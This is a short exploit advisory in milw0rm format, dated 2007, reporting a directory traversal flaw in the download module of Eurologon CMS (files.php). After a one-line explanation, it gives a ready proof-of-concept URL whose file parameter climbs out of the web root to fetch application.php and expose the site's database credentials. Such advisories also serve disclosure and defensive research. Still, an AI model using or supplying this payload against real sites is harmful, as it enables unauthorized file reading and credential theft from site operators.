1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 ____ __________ __ ____ __
3 /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
4 | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
5 | | | \ | |/ \ \___| | /_____/ | || |
6 |___|___| /\__| /______ /\___ >__| |___||__|
7 \/\______| \/ \/
8 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
9
10 Http://www.inj3ct−it.org
Staff[at]inj3ct−it[dot]org
11
12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
13
14 Eurologon CMS Db credentials disclosure / files download
15
16 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
17
18 #By KiNgOfThEwOrLd
19
20 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
21 PoC
22
23 The download module, not correctly check the file parameter, then using
24 directory traversal we can get all the files hosted in our target web space.
25 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
26 Get Database Credentials
27
28 http://[target]/users/files.php?mode=download&file=../../application.php
29 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
30
31 # milw0rm.com [2007−11−27]
Page 1/1
Eurologon CMS files.php Arbitrary File Download Vulnerability
KiNgOfThEwOrLd
11/27/2007